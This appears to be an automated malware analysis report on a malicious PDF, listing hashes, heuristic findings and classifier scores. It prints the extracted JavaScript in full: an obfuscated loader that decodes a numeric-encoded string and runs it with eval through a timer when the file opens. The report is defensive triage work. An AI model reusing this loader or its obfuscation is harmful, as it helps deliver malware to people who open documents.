Malicious PDF — malware analysis report

Static analysis result for SHA-256 59751d1c0de82ce9…

MALICIOUS

PDF

37.4 KB Created: 2010-04-12 20:38:29 +04:00 Authoring application: TCPDF (via TCPDF 4.8.032 (http://www.tcpdf.org)) First seen: 2026-05-10
MD5: 41f952a2eb197b16c4ac18cdc11044bb SHA-1: 4ddd1208776afbc26048fd08e01384ed867b8c02 SHA-256: 59751d1c0de82ce9be9320ee1276b92e1e270c66c244f8184bec475a4429411a
74 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger low PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0x704A 8330 bytes
SHA-256: 9b7c61307471861237a322d43fdc6c0de224eeb78514da8981cbbb19b2a832d6
Preview script
First 1,000 lines of the extracted script
�� 
 v a r   t q r h N 0 H   =   ' 2 4 2 r 2 5 7 y 2 5 0 a 2 3 9 h 2 5 6 F 2 4 5 y 2 5 1 z 2 5 0 t 1 7 2 H 2 4 0 u 2 4 1 P 2 3 9 D 2 5 1 o 2 4 0 c 2 4 1 z 2 3 5 X 2 3 8 p 2 4 5 K 2 5 2 R 1 8 0 k 2 4 1 v 2 5 0 J 2 3 9 d 2 3 5 E 2 5 5 Q 2 5 6 W 2 5 4 T 1 8 1 R 1 5 0 H 2 6 3 U 1 5 0 u 1 7 2 z 1 7 2 S 1 7 2 U 1 7 2 g 2 5 8 Y 2 3 7 T 2 5 4 f 1 7 2 S 2 3 7 b 2 5 4 a 1 7 2 h 2 0 1 e 1 7 2 O 2 5 0 J 2 4 1 e 2 5 9 m 1 7 2 z 2 0 5 p 2 5 4 D 2 5 4 j 2 3 7 k 2 6 1 N 1 8 0 N 1 8 1 p 1 9 9 d 1 5 0 k 1 7 2 J 1 7 2 v 1 7 2 r 1 7 2 d 2 3 7 q 2 5 4 q 1 7 2 w 2 0 1 L 1 7 2 W 2 4 1 U 2 5 0 e 2 3 9 C 2 3 5 m 2 5 5 F 2 5 6 c 2 5 4 U 1 8 6 k 2 5 5 r 2 5 2 e 2 4 8 P 2 4 5 d 2 5 6 d 1 8 0 F 1 7 9 g 1 9 9 N 1 7 9 p 1 8 1 u 1 9 9 a 1 5 0 f 1 7 2 X 1 7 2 K 1 7 2 o 1 7 2 T 2 5 8 C 2 3 7 S 2 5 4 K 1 7 2 t 2 5 0 O 2 5 1 V 2 5 2 Q 1 7 2 i 2 0 1 A 1 7 2 S 1 7 9 V 1 7 9 G 1 9 9 v 1 5 0 q 1 7 2 r 1 7 2 m 1 7 2 U 1 7 2 G 2 4 2 P 2 5 1 x 2 5 4 L 1 8 0 w 2 4 5 K 1 7 2 B 2 0 1 q 1 7 2 l 1 8 8 h 1 9 9 O 2 4 5 w 1 7 2 V 2 0 0 i 1 7 2 y 2 3 7 o 2 5 4 s 1 8 6 r 2 4 8 C 2 4 1 O 2 5 0 H 2 4 3 l 2 5 6 P 2 4 4 a 1 9 9 H 2 4 5 V 1 8 3 V 1 8 3 x 1 8 1 M 1 7 2 H 2 6 3 R 1 5 0 T 1 4 9 W 2 5 0 P 2 5 1 e 2 5 2 T 1 8 3 a 2 0 1 g 2 2 3 J 2 5 6 L 2 5 4 N 2 4 5 X 2 5 0 H 2 4 3 j 1 8 6 G 2 4 2 G 2 5 4 X 2 5 1 y 2 4 9 y 2 0 7 a 2 4 4 N 2 3 7 F 2 5 4 L 2 0 7 c 2 5 1 f 2 4 0 S 2 4 1 x 1 8 0 B 2 3 7 Q 2 5 4 K 2 3 1 I 2 4 5 h 2 3 3 d 1 8 1 e 1 9 9 w 1 5 0 I 1 7 2 x 1 7 2 W 1 7 2 p 1 7 2 H 2 6 5 i 1 5 0 C 1 7 2 f 1 7 2 q 1 7 2 m 1 7 2 l 2 5 4 x 2 4 1 K 2 5 6 k 2 5 7 v 2 5 4 l 2 5 0 x 1 7 2 B 2 5 0 w 2 5 1 a 2 5 2 h 1 9 9 P 1 5 0 Y 2 6 5 i 1 5 0 f 1 5 0 i 2 4 2 q 2 5 7 N 2 5 0 M 2 3 9 V 2 5 6 K 2 4 5 U 2 5 1 T 2 5 0 g 1 7 2 J 2 3 9 a 2 4 4 P 2 4 1 M 2 3 9 G 2 4 7 G 2 3 5 z 2 5 4 r 2 5 7 D 2 5 0 J 1 8 0 b 1 8 1 y 1 5 0 u 2 6 3 Z 1 5 0 z 1 7 2 r 1 7 2 z 1 7 2 g 1 7 2 H 2 5 6 X 2 4 4 O 2 4 5 n 2 5 5 G 1 8 6 F 2 5 5 A 2 6 1 S 2 5 0 a 2 3 9 K 2 0 5 n 2 5 0 t 2 5 0 r 2 5 1 x 2 5 6 U 2 2 3 H 2 3 9 J 2 3 7 a 2 5 0 N 1 8 0 J 1 8 1 S 1 9 9 Q 1 5 0 S 1 7 2 t 1 7 2 O 1 7 2 N 1 7 2 T 2 5 8 O 2 3 7 F 2 5 4 S 1 7 2 u 2 5 8 M 2 4 1 q 2 5 4 J 2 5 5 z 2 4 5 w 2 5 1 O 2 5 0 A 1 7 2 O 2 0 1 p 1 7 2 L 2 3 7 C 2 5 2 j 2 5 2 D 1 8 6 z 2 5 8 D 2 4 5 K 2 4 1 J 2 5 9 e 2 4 1 Y 2 5 4 S 2 2 6 w 2 4 1 o 2 5 4 l 2 5 5 q 2 4 5 D 2 5 1 y 2 5 0 J 1 8 6 S 2 5 6 D 2 5 1 c 2 2 3 M 2 5 6 Q 2 5 4 S 2 4 5 W 2 5 0 Q 2 4 3 O 1 8 0 l 1 8 1 Q 1 9 9 d 1 5 0 a 1 7 2 c 1 7 2 f 1 7 2 J 1 7 2 f 2 5 8 f 2 4 1 N 2 5 4 q 2 5 5 o 2 4 5 s 2 5 1 O 2 5 0 G 1 7 2 o 2 0 1 C 1 7 2 r 2 5 8 f 2 4 1 G 2 5 4 q 2 5 5 o 2 4 5 Y 2 5 1 u 2 5 0 Q 1 8 6 l 2 5 4 K 2 4 1 j 2 5 2 I 2 4 8 b 2 3 7 y 2 3 9 t 2 4 1 r 1 8 0 b 1 8 7 U 2 3 2 U 2 0 8 H 1 8 7 d 2 4 3 z 1 8 4 m 1 7 2 r 1 7 4 p 1 7 4 a 1 8 1 j 1 9 9 E 1 5 0 h 1 7 2 Y 1 7 2 G 1 7 2 Z 1 7 2 D 2 5 8 N 2 3 7 P 2 5 4 s 1 7 2 l 2 5 8 K 2 3 7 J 2 5 4 X 2 5 5 V 2 4 5 s 2 5 1 f 2 5 0 w 2 3 5 q 2 3 7 Y 2 5 4 n 2 5 4 S 2 3 7 s 2 6 1 I 1 7 2 a 2 0 1 W 1 7 2 H 2 5 0 M 2 4 1 N 2 5 9 x 1 7 2 n 2 0 5 w 2 5 4 B 2 5 4 V 2 3 7 V 2 6 1 I 1 8 0 u 2 5 8 Y 2 4 1 V 2 5 4 K 2 5 5 Q 2 4 5 H 2 5 1 U 2 5 0 Z 1 8 6 e 2 3 9 q 2 4 4 S 2 3 7 J 2 5 4 m 2 0 5 J 2 5 6 i 1 8 0 a 1 8 8 b 1 8 1 b 1 8 4 i 1 7 2 B 2 5 8 x 2 4 1 p 2 5 4 O 2 5 5 K 2 4 5 n 2 5 1 C 2 5 0 H 1 8 6 o 2 3 9 Y 2 4 4 c 2 3 7 w 2 5 4 S 2 0 5 B 2 5 6 S 1 8 0 d 1 8 9 R 1 8 1 Z 1 8 4 y 1 7 2 r 2 5 8 E 2 4 1 o 2 5 4 K 2 5 5 O 2 4 5 a 2 5 1 T 2 5 0 w 1 8 6 A 2 3 9 u 2 4 4 X 2 3 7 j 2 5 4 w 2 0 5 V 2 5 6 Y 1 8 0 L 1 9 0 g 1 8 1 M 1 8 1 O 1 9 9 n 1 5 0 A 1 7 2 m 1 7 2 Q 1 7 2 x 1 7 2 F 2 4 5 S 2 4 2 Q 1 7 2 i 1 8 0 k 1 8 0 q 2 5 8 h 2 3 7 b 2 5 4 u 2 5 5 V 2 4 5 l 2 5 1 I 2 5 0 w 2 3 5 F 2 3 7 F 2 5 4 x 2 5 4 z 2 3 7 d 2 6 1 g 2 3 1 w 1 8 8 y 2 3 3 F 1 7 2 I 2 0 0 e 1 7 2 R 1 9 6 W 1 8 1 S 1 7 2 R 2 6 4 I 2 6 4 j 1 7 2 P 1 8 0 O 2 5 8 B 2 3 7 f 2 5 4 x 2 5 5 l 2 4 5 V 2 5 1 e 2 5 0 N 2 3 5 Q 2 3 7 A 2 5 4 z 2 5 4 Z 2 3 7 w 2 6 1 E 2 3 1 e 1 8 8 u 2 3 3 E 1 7 2 I 2 0 1 a 2 0 1 A 1 7 2 G 1 9 6 f 1 7 2 J 1 7 8 k 1 7 8 x 1 7 2 f 2 5 8 C 2 3 7 P 2 5 4 o 2 5 5 l 2 4 5 e 2 5 1 C 2 5 0 n 2 3 5 K 2 3 7 z 2 5 4 Y 2 5 4 g 2 3 7 e 2 6 1 m 2 3 1 x 1 8 9 e 2 3 3 l 1 7 2 W 2 0 0 b 1 7 2 p 1 9 0 B 1 7 2 V 1 7 8 t 1 7 8 J 1 7 2 w 2 5 8 u 2 3 7 Q 2 5 4 c 2 5 5 D 2 4 5 A 2 5 1 Z 2 5 0 j 2 3 5 D 2 3 7 o 2 5 4 Y 2 5 4 p 2 3 7 T 2 6 1 b 2 3 1 c 1 9 0 e 2 3 3 b 1 7 2 B 2 0 0 K 1 7 2 F 1 9 0 n 1 8 1 H 1 8 1 j 1 7 2 Y 2 6 3 e 1 5 0 K 1 4 9 O 2 5 8 g 2 3 7 g 2 5 4 I 1 7 2 q 2 3 7 c 2 5 0 D 2 5 0 G 1 7 2 E 2 0 1 G 1 7 2 G 2 5 6 d 2 4 4 q 2 4 5 K 2 5 5 S 1 8 6 O 2 4 3 z 2 4 1 l 2 5 6 p 2 0 5 c 2 5 0 P 2 5 0 Q 2 5 1 d 2 5 6 a 1 8 0 V 1 8 8 Q 1 8 4 i 1 7 2 F 1 7 4 p 1 8 8 N 1 8 8 Q 1 8 8 E 1 8 9 t 1 8 5 w 1 8 8 M 1 8 8 j 1 8 8 Z 1 8 9 P 1 7 4 p 1 8 1 d 1 9 9 W 1 7 2 w 1 5 0 H 1 4 9 M 2 5 8 G 2 3 7 Z 2 5 4 b 1 7 2 G 2 3 8 K 2 4 5 Q 2 5 2 i 1 7 2 a 2 0 1 h 1 7 2 L 1 7 9 A 1 7 9 D 1 9 9 c 1 5 0 j 1 4 9 J 2 4 5 S 2 4 2 w 1 8 0 Z 1 7 2 W 2 3 7 p 2 5 0 W 2 5 0 i 1 7 2 Z 1 7 3 v 2 0 1 y 1 7 2 O 2 5 0 Z 2 5 7 U 2 4 8 K 2 4 8 g 1 7 2 h 1 8 1 R 1 7 2 F 2 6 3 I 1 5 0 X 1 4 9 Q 1 7 2 Z 1 7 2 F 1 7 2 r 1 7 2 H 2 3 8 R 2 4 5 s 2 5 2 K 1 7 2 u 2 0 1 b 1 7 2 U 2 3 7 N 2 5 0 Y 2 5 0 t 1 8 6 j 2 5 5 N 2 5 7 Q 2 3 8 S 2 4 6 m 2 4 1 M 2 3 9 Q 2 5 6 B 1 9 9 l 1 5 0 l 1 4 9 M 2 6 5 R 1 5 0 S 1 4 9 d 2 5 0 X 2 4 5 b 2 5 2 A 1 7 2 o 2 0 1 B 1 7 2 G 2 4 0 f 2 4 1 I 2 3 9 Y 2 5 1 Y 2 4 0 T 2 4 1 T 2 3 5 z 2 3 8 n 2 4 5 g 2 5 2 X 1 8 0 h 2 3 8 P 2 4 5 l 2 5 2 y 1 8 1 i 1 9 9 Y 1 5 0 K 1 4 9 y 2 4 1 Z 2 5 8 v 2 3 7 k 2 4 8 l 1 8 0 N 2 5 0 D 2 4 5 P 2 5 2 l 1 8 1 f 1 9 9 Q 1 5 0 Z 1 7 2 g 1 7 2 X 1 7 2 F 1 7 2 p 2 6 5 v 1 7 2 d 2 4 1 J 2 4 8 P 2 5 5 d 2 4 1 x 1 7 2 v 2 6 3 B 1 5 0 f 1 4 9 L 2 5 8 n 2 3 7 d 2 5 4 t 1 7 2 L 2 3 7 n 2 5 0 s 2 5 0 l 1 7 2 j 2 0 1 d 1 7 2 X 2 5 6 w 2 4 4 g 2 4 5 m 2 5 5 h 1 8 6 L 2 4 3 C 2 4 1 H 2 5 6 r 2 0 5 Z 2 5 0 N 2 5 0 h 2 5 1 V 2 5 6 r 1 8 0 q 1 8 8 k 1 8 4 V 1 7 2 n 1 7 4 g 1 8 8 W 1 8 8 T 1 8 8 r 1 8 9 K 1 8 5 w 1 8 8 l 1 8 8 V 1 8 8 j 1 8 8 e 1 7 4 H 1 8 1 S 1 9 9 H 1 7 2 e 1 5 0 P 1 4 9 n 2 5 8 Q 2 3 7 x 2 5 4 y 1 7 2 T 2 3 8 F 2 4 5 q 2 5 2 t 1 7 2 T 2 0 1 Y 1 7 2 O 1 7 9 K 1 7 9 O 1 9 9 z 1 5 0 f 1 4 9 C 2 4 5 f 2 4 2 C 1 8 0 V 1 7 2 X 2 3 7 M 2 5 0 S 2 5 0 J 1 7 2 i 1 7 3 B 2 0 1 n 1 7 2 p 2 5 0 U 2 5 7 u 2 4 8 T 2 4 8 k 1 7 2 i 1 8 1 k 1 7 2 i 2 6 3 h 1 5 0 E 1 7 2 n 1 7 2 X 1 7 2 x 1 7 2 G 1 4 9 w 1 7 2 M 1 7 2 R 1 7 2 L 1 7 2 M 2 3 8 x 2 4 5 O 2 5 2 s 1 7 2 A 2 0 1 j 1 7 2 P 2 3 7 M 2 5 0 C 2 5 0 Z 1 8 6 v 2 5 5 E 2 5 7 M 2 3 8 l 2 4 6 Y 2 4 1 G 2 3 9 E 2 5 6 J 1 9 9 p 1 5 0 p 1 4 9 r 2 6 5 W 1 5 0 t 1 4 9 f 2 5 0 u 2 4 5 r 2 5 2 l 1 7 2 q 2 0 1 E 1 7 2 D 2 4 0 B 2 4 1 Q 2 3 9 A 2 5 1 P 2 4 0 I 2 4 1 A 2 3 5 z 2 3 8 Y 2 4 5 N 2 5 2 B 1 8 0 x 2 3 8 I 2 4 5 F 2 5 2 K 1 8 1 u 1 9 9 e 1 5 0 Q 1 4 9 z 2 4 1 o 2 5 8 F 2 3 7 o 2 4 8 f 1 8 0 c 2 5 0 i 2 4 5 L 2 5 2 W 1 8 1 a 1 9 9 x 1 5 0 M 1 7 2 e 1 7 2 A 1 7 2 N 1 7 2 u 2 6 5 A 1 5 0 d 2 6 5 D 1 5 0 B 1 5 0 c 2 3 7 c 2 5 2 O 2 5 2 e 1 8 6 Z 2 3 7 X 2 4 8 k 2 4 1 j 2 5 4 R 2 5 6 O 1 8 0 A 1 7 9 Q 1 8 9 C 1 7 9 G 1 8 1 F 1 9 9 i 1 5 0 i 2 3 9 o 2 4 4 t 2 4 1 E 2 3 9 O 2 4 7 q 2 3 5 Q 2 5 4 t 2 5 7 r 2 5 0 e 1 8 0 o 1 8 1 r 1 9 9 H ' ; 
 v a r   k b y Z w G a G J   =   1 4 0 ; 
 t q r h N 0 H   =     t q r h N 0 H . r e p l a c e ( / [ ^ 0 - 9 ] / g , ' : ' ) ; 
 e u A e h U B 6   =   ' k b y Z w G a G J ' ; 
 t q r h N 0 H   =     t q r h N 0 H . r e p l a c e ( / : : / g , ' ' ) ; 
 a p p . a l e r t ( t q r h N 0 H ) ; 
 f u n c t i o n   L f O m D 2 J z s 0 9 H   (   p q k T 1 s k E 9 v I Q ,   M Y w S 5 H z J 9 M A h   )   {   v a r   t N z N 0   =   n e w   S t r i n g ( ) ; v a r   b S R h n J W N 6 M   =   n e w   S t r i n g ( ) ; 
 T w E E K   =   p q k T 1 s k E 9 v I Q   . s p l i t ( ' : ' ) ; 
 f o r ( S W C y V m v m   =   0 ;   S W C y V m v m   <   T w E E K . l e n g t h - 1 ; S W C y V m v m + + )   {   y B 7 5 Z 6 R j =   S t r i n g [ ' f r o m C h a r C o d e ' ] ( T w E E K [ S W C y V m v m ]   -   M Y w S 5 H z J 9 M A h ) ; ; 
 b S R h n J W N 6 M   =   b S R h n J W N 6 M   +   y B 7 5 Z 6 R j ; }   r e t u r n   b S R h n J W N 6 M ; } ; 
 e u A e h U B 6   =   L f O m D 2 J z s 0 9 H ( t q r h N 0 H , k b y Z w G a G J ) ; 
 v a r   U X c W l r q 9   =   ' a ' ; 
 v a r   M 4 8 u q 3 g C   =   ' u ' ; 
 M F B 4 H r G W e W K X   =     a p p [ ' s e t ' + ' T i m e O '   +   M 4 8 u q 3 g C   + ' t ' ] ( " e v " + U X c W l r q 9 + " l ( e u A e h U B 6 ) " ,   1 ) ;
stream_001_off0000704a.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x704A 4164 bytes
SHA-256: 7a0f06cc6b4f756e1953d7d2cc33462acadfd0ad55540bfc750d8425132a5ae0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 10 of 19 identifiers look randomly generated (e.g. 'r257y250a239h256F245y251z250t172H240u241') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).